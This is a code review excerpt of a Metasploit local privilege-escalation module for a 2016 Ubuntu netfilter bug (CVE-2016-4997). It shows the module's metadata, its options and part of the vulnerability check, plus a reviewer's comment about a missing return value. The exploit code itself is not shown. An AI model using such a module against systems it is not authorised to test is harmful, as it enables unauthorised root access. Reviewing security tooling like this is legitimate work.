modules/exploits/linux/local/ubuntu_netfilter.rb

```diff
@@ -0,0 +1,332 @@
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require "msf/core"
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GoodRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+        'Name'           => 'Ubuntu Netfilter Privilege Escalation',
+        'Description'    => %q{
+          This module attempts to exploit a netfilter bug on Ubuntu 16.04 (not 16.04.1) with kernel
+          4.4.0-21-generic.  Several conditions have to be met for successful exploitation:
+          1. ip_tables.ko has to be loaded (root running iptables -L will do such)
+          2. libc6-dev-i386 needs to be installed to compile
+          Kernel 4.4.0-31-generic and newer are not vulnerable.
+
+          We write the ascii files and compile on target instead of locally since metasm bombs for not
+          having cdefs.h (even if locally installed)
+        },
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'h00die <mike@stcyrsecurity.com>',  # Module
+            'vnik'                         # Discovery
+          ],
+        'DisclosureDate' => 'Jun 03 2016',
+        'Platform'       => [ 'linux'],
+        'Arch'           => [ ARCH_X86 ],
+        'SessionTypes'   => [ 'shell', 'meterpreter' ],
+        'Targets'        =>[[ 'Linux x86', { 'Arch' => ARCH_X86 } ]],
+        'DefaultTarget'  => 0,
+        'References'     =>
+          [
+            [ 'EDB', '40049'],
+            [ 'CVE', '2016-4997']
+          ]
+      ))
+    register_options(
+      [
+        OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),
+        OptString.new('MAXWAIT', [ true, 'Max time to wait for decrementation in seconds', 120 ])
+      ], self.class)
+  end
+
+  def check
+    def iptables_loaded?()
+      # user@ubuntu:~$ cat /proc/modules | grep ip_tables
+      # ip_tables 28672 1 iptable_filter, Live 0x0000000000000000
+      # x_tables 36864 2 iptable_filter,ip_tables, Live 0x0000000000000000
+      vprint_status('Checking if ip_tables.ko is loaded')
+      iptables = cmd_exec('cat /proc/modules | grep ip_tables')
+      if iptables.include?('ip_tables')
+        vprint_good('ip_tables.ko is loaded')
+      else
+        print_error('ip_tables.ko is not loaded.  root needs to run iptables -L or similar command')
+      end
+      return iptables.include?('ip_tables')
+    end
+
+    def libs_installed?()
+      # user@ubuntu:~$ dpkg --get-selections | grep libc6-dev-i386
+      # libc6-dev-i386					install
+      vprint_status('Checking if libc6-dev-i386 is installed')
+      lib = cmd_exec('dpkg --get-selections | grep libc6-dev-i386')
+      if lib.include?('install')
+        vprint_good('libc6-dev-i386 is installed')
+      else
+        print_error('libc6-dev-i386 is not installed.  Compiling will fail.')
```

Comment:
Need to return a false after this statement otherwise the return on line 78 will be true irrespective of of installed libs.